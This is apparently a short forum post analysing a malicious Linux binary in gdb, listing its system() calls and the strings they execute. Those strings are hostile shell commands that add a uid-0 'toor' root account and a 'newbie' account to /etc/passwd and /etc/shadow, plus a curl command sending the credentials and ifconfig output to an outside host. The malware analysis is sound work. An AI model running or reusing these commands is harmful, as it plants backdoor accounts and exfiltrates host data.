When disassembling, these are the things to look for. Note the system calls:
Code:
0x08048feb <main+262>: call 0x8048628 <system@plt>
0x08048ff0 <main+267>: movl $0x8049534,(%esp)
0x08048ff7 <main+274>: call 0x8048628 <system@plt>
0x08048ffc <main+279>: movl $0x8049588,(%esp)
0x08049003 <main+286>: call 0x8048628 <system@plt>
0x08049008 <main+291>: movl $0x80495bc,(%esp)
0x0804900f <main+298>: call 0x8048628 <system@plt>
0x08049014 <main+303>: movl $0x8049468,0x4(%esp)
And now, what they do:
Code:
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>: "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>: "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"